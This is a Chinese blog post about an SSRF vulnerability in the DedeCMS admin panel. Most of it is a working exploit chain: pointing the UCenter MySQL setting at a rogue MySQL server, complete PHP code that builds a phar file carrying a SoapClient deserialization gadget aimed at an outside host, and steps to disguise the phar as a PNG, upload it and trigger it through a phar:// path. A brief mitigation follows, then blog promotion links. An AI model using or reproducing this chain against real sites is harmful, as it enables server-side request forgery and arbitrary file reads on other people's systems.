dedecms织梦后台存在SSRF漏洞怎么解决

于 2022-09-05 18:33:02 发布
阅读量374 收藏
点赞数
分类专栏: 织梦 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gezhancn/article/details/126711030
版权

dedecms的后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。指向我们预先构造的rogue mysql server
设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。 假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 根据dedecms的代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。

<?php
 
class Control
 
{
 
    var $tpl;
 
    public $dsql;
 
    function __construct(){
 
                $this->dsql = new SoapClient(null,array('uri'=>'http://www.91084.com', 'location'=>'http://www.91084.com/a'));
 
        }
 
}
 
@unlink("dedecms.phar");
 
$phar = new Phar("dedecms.phar");
 
$phar->startBuffering();
 
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
 
$o = new Control();
 
$phar->setMetadata($o); 
 
$phar->addFromString("test.txt", "test");
 
$phar->stopBuffering();
 
?>

将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。
上传成功之后可以从文件列表中获取到图片链接。
phar://../uploads/allimg/91084/1_1529564891.png/test.txt
设置完成之后,刷新就可以触发ssrf。
临时解决方案:
通过mysqli_options设置链接时禁用allow_local_infile配置可阻止该漏洞。
或在php.ini中改配置为mysqli.allow_local_infile = Off

格展网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
网站源码篷房帐篷pbootcms模板网页设计主题
07-23 328
我们把它制作成模板收录在格展网络中,此次设计的篷房帐篷网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的篷房帐篷信息获取体验。总之,篷房帐篷网站主题网站设计应注重用户体验和品牌形象展示,通过清晰合理的布局、丰富的产品展示和新闻资讯、专业的案例展示以及便捷的联系方式等手段,为用户提供全面的服务和支持。篷房帐篷网站主题网站设计主要围绕展示篷房和帐篷的相关信息、产品、服务以及企业品牌形象。我很高兴向大家介绍我刚刚制作的篷房帐篷的网站设计。
博客
网站源码活动板房pbootcms模板网页设计主题
07-23 745
我们把它制作成模板收录在格展网络中,此次设计的活动板房网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的活动板房信息获取体验。活动板房网站主题网站设计主要围绕展示活动板房的产品、服务、解决方案以及企业品牌形象。通过以上设计,活动板房网站能够全面展示企业的产品、服务、技术实力以及品牌形象,为用户提供良好的浏览体验和便捷的购买服务。我很高兴向大家介绍我刚刚制作的活动板房的网站设计。友好的站点界面,是打动访客的第一步。活动板房的网站设计分享。
博客
网站源码机械加工pbootcms模板网页设计主题
07-23 259
我们把它制作成模板收录在格展网络中,此次设计的机械加工网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。综上所述,机械加工网站的主题网站设计需要注重专业性、技术性和可靠性,通过视觉设计、内容策划、用户体验、技术支持和营销策略等多个方面的综合考虑,为用户提供清晰、便捷、专业的机械加工产品和服务。机械加工网站的主题网站设计需要突出其专业性、技术性和可靠性,同时提供清晰的产品展示、服务介绍以及便捷的交互体验。我很高兴向大家介绍我刚刚制作的机械加工的网站设计。机械加工的网站设计分享。
博客
网站源码净化设备pbootcms模板网页设计主题
07-23 434
综上所述,净化设备网站的主题网站设计需要注重产品的专业性、高效性和环保性,同时提供清晰的产品信息、友好的用户体验和有效的营销策略。通过视觉设计、内容策划、用户体验、技术支持和营销策略等多个方面的综合考虑,为用户提供专业、便捷的净化设备购买和服务体验。我们把它制作成模板收录在格展网络中,此次设计的净化设备网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。净化设备网站的主题网站设计需要突出产品的专业性、高效性和环保性,同时确保用户能够轻松找到所需信息并获得良好的交互体验。
博客
网站源码电动闸门pbootcms模板网页设计主题
07-23 518
我们把它制作成模板收录在格展网络中,此次设计的电动闸门网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。电动闸门网站的主题网站设计需要凸显产品的功能性、技术特点以及安全可靠性,同时确保访问者能够轻松获取所需信息,并与公司进行有效的沟通。通过以上方面的综合考虑,电动闸门网站的主题网站设计将能够充分展示产品的功能性、技术特点以及安全可靠性,同时提供优质的用户体验,吸引更多潜在客户并建立良好的品牌形象。我很高兴向大家介绍我刚刚制作的电动闸门的网站设计。友好的站点界面,是打动访客的第一步。
博客
网站源码离心风机pbootcms模板网页设计主题
07-22 423
我们把它制作成模板收录在格展网络中,此次设计的离心风机网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的离心风机信息获取体验。离心风机网站的主题设计在机械制造类网站中占据重要地位,其设计应充分考虑用户需求、品牌形象、产品特性以及搜索引擎优化(SEO)等因素。综上所述,离心风机网站的主题设计应注重用户体验、品牌形象和SEO优化等方面,通过精心策划和设计,打造出一个专业、易用、美观的离心风机网站。离心风机的网站设计分享。
博客
网站源码火锅食材pbootcms模板网页设计主题
07-22 618
我们把它制作成模板收录在格展网络中,此次设计的火锅食材网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的火锅食材信息获取体验。火锅食材网站主题设计应专注于提供丰富的火锅食材选择、便捷的购物体验以及相关的火锅文化和食谱信息。通过以上设计,火锅食材网站能够为用户提供丰富的火锅食材选择、便捷的购物体验以及相关的火锅文化和食谱信息,帮助用户更好地享受火锅美食。我很高兴向大家介绍我刚刚制作的火锅食材的网站设计。火锅食材的网站设计分享。
博客
网站源码家居装饰pbootcms模板网页设计主题
07-22 285
我们把它制作成模板收录在格展网络中,此次设计的家居装饰网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的家居装饰信息获取体验。综上所述,家居装饰网站的主题网站设计需要综合考虑设计风格、页面布局、功能板块、技术实现、优化策略以及其他设计要点等多个方面。家居装饰网站的主题网站设计通常涉及多个方面,以确保用户能够轻松浏览、获取所需信息,并享受愉悦的在线体验。我很高兴向大家介绍我刚刚制作的家居装饰的网站设计。友好的站点界面,是打动访客的第一步。
博客
网站源码磁电设备pbootcms模板网页设计主题
07-22 613
我们把它制作成模板收录在格展网络中,此次设计的磁电设备网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的磁电设备信息获取体验。当设计一个磁电设备网站的主题网站时,需要专注于展示磁电设备的专业性和技术特点,同时确保网站的用户友好性和易于导航。综上所述,磁电设备网站的主题网站设计需要注重专业性、技术感和用户体验。通过精心设计和不断优化,可以为用户提供一个专业、易用且富有吸引力的磁电设备网站。我很高兴向大家介绍我刚刚制作的磁电设备的网站设计。
博客
网站源码仓储货架pbootcms模板网页设计主题
07-21 546
我们把它制作成模板收录在格展网络中,此次设计的仓储货架网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的仓储货架信息获取体验。通过以上关键要点的设计,仓储货架网站能够有效地展示公司的货架产品、解决方案和专业实力,吸引更多潜在客户并提升公司的品牌形象。仓储货架网站的主题网站设计应聚焦于清晰地展示货架产品、提供解决方案、增强用户体验,并有效传达公司的专业性和可靠性。我很高兴向大家介绍我刚刚制作的仓储货架的网站设计。仓储货架的网站设计分享。
博客
网站源码电子设备pbootcms模板网页设计主题
07-21 505
我们把它制作成模板收录在格展网络中,此次设计的电子设备网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。电子设备网站主题网站设计是一个综合性的过程,旨在通过精心设计的页面和功能,提升企业的互联网品牌形象,并增强用户的信任感,从而促进业务的发展。通过以上各个方面的综合设计,电子设备网站主题网站设计能够为企业打造一个专业、美观、易用且功能丰富的网站平台,从而提升企业的品牌形象和竞争力。我很高兴向大家介绍我刚刚制作的电子设备的网站设计。友好的站点界面,是打动访客的第一步。
博客
网站源码金属制品pbootcms模板网页设计主题
07-21 910
我们把它制作成模板收录在格展网络中,此次设计的金属制品网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的金属制品信息获取体验。金属制品网站主题网站设计需要聚焦于展示金属制品的多样性、质量、应用领域以及公司实力。通过以上设计理念和功能模块,金属制品网站主题设计能够为企业打造一个专业、高效、用户友好的网站平台,提升品牌形象和市场竞争力。我很高兴向大家介绍我刚刚制作的金属制品的网站设计。友好的站点界面,是打动访客的第一步。
博客
网站源码活动隔断pbootcms模板网页设计主题
07-21 767
我们把它制作成模板收录在格展网络中,此次设计的活动隔断网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的活动隔断信息获取体验。通过以上设计理念和功能模块,活动隔断网站主题网站设计能够为企业打造一个专业、现代、用户友好的网站平台,展示活动隔断产品的特点和优势,吸引更多潜在客户并提升品牌形象。活动隔断网站主题网站设计旨在向用户展示活动隔断产品的特点、应用场景、品牌实力及优势等。我很高兴向大家介绍我刚刚制作的活动隔断的网站设计。
博客
网站源码五金机械pbootcms模板网页设计主题
07-20 763
我们把它制作成模板收录在格展网络中,此次设计的五金机械网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的五金机械信息获取体验。五金机械网站主题网站设计是一个针对五金机械行业特性进行的专业化网站构建过程。请注意,上述内容是基于搜索结果的一般性介绍,具体的网站设计可能因企业需求和目标而有所差异。我很高兴向大家介绍我刚刚制作的五金机械的网站设计。友好的站点界面,是打动访客的第一步。这款网站模板制作分享链接我放在下面了,可以开箱即用。
博客
网站源码代理记账pbootcms模板网页设计主题
07-20 609
我们把它制作成模板收录在格展网络中,此次设计的代理记账网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的代理记账信息获取体验。代理记账网站主题网站设计是专门为提供代理记账服务的公司或机构打造的网站设计。请注意,以上内容是基于搜索结果的一般性介绍,具体的网站设计可能因公司需求、目标受众和行业特点而有所不同。我很高兴向大家介绍我刚刚制作的代理记账的网站设计。友好的站点界面,是打动访客的第一步。代理记账的网站设计分享。
博客
网站源码采矿设备pbootcms模板网页设计主题
07-20 563
我们把它制作成模板收录在格展网络中,此次设计的采矿设备网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。通过以上的设计要点,一个专业的采矿设备网站主题将能够有效地展示产品、吸引潜在客户并促进业务增长。同时,还需要根据目标用户的具体需求和行业特点进行定制化的设计,以满足不同用户的需求。当设计一个采矿设备网站的主题时,我们需要考虑该行业的特性和目标用户的需求,以确保网站能够有效地展示产品、吸引潜在客户并促进业务增长。我很高兴向大家介绍我刚刚制作的采矿设备的网站设计。采矿设备的网站设计分享。
博客
网站源码快递物流pbootcms模板网页设计主题
07-20 1008
我们把它制作成模板收录在格展网络中,此次设计的快递物流网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的快递物流信息获取体验。通过以上的设计要点,一个优秀的快递物流网站主题将能够提供便捷、高效、安全的快递服务,同时展现公司的品牌形象和企业文化,吸引更多的用户和客户。快递物流网站主题网站设计需要考虑到用户体验、功能性和品牌形象等多个方面。我很高兴向大家介绍我刚刚制作的快递物流的网站设计。快递物流的网站设计分享。6. 客户服务与支持。
博客
网站源码装修设计pbootcms模板网页设计主题
07-19 239
装修设计网站还会展示各种优秀的装修案例,包括住宅、商业空间、公共空间等不同类型的装修项目。装修设计网站通常会提供大量的设计灵感和素材,包括各种风格的装修效果图、3D模型、施工图等。装修设计网站主题网站设计是一个涵盖了装修设计灵感、素材、案例和行业动态等多方面内容的网站设计领域。这样的社区不仅有助于设计师之间的相互学习和交流,还能帮助他们拓展人脉和资源,为自己的职业发展创造更多机会。综上所述,装修设计网站主题网站设计是一个集设计灵感、素材、案例展示、行业动态与资讯以及互动交流于一体的综合性平台。
博客
网站源码工商注册pbootcms模板网页设计主题
07-19 364
我们把它制作成模板收录在格展网络中,此次设计的工商注册网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。我们坚信,通过这款设计,能够为大家带来更加便捷的工商注册信息获取体验。工商注册网站主题网站设计旨在为企业和个人提供一个便捷、清晰、专业的在线平台,用于完成公司注册、企业信息查询、法律法规查询等相关服务。通过以上设计,工商注册网站能够为企业和个人提供便捷、高效、专业的在线工商注册服务,提升用户体验和满意度,同时树立网站的专业形象和权威地位。工商注册的网站设计分享。
博客
网站源码升降设备pbootcms模板网页设计主题
07-19 812
我们把它制作成模板收录在格展网络中,此次设计的升降设备网站主题模板,我们注重了用户体验的多样性,确保各类浏览器都能流畅访问。综上所述,升降设备网站主题设计应突出产品的专业性和可靠性,同时提供用户友好的浏览和购买体验。通过合理的布局、清晰的分类、详细的参数介绍、高清的图片展示以及完善的技术支持等设计元素,可以有效提升用户对升降设备网站的满意度和信任感。升降设备网站主题网站设计应专注于展示升降设备的多样性、专业性和安全可靠性,同时提供用户友好的浏览和购买体验。我很高兴向大家介绍我刚刚制作的升降设备的网站设计。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值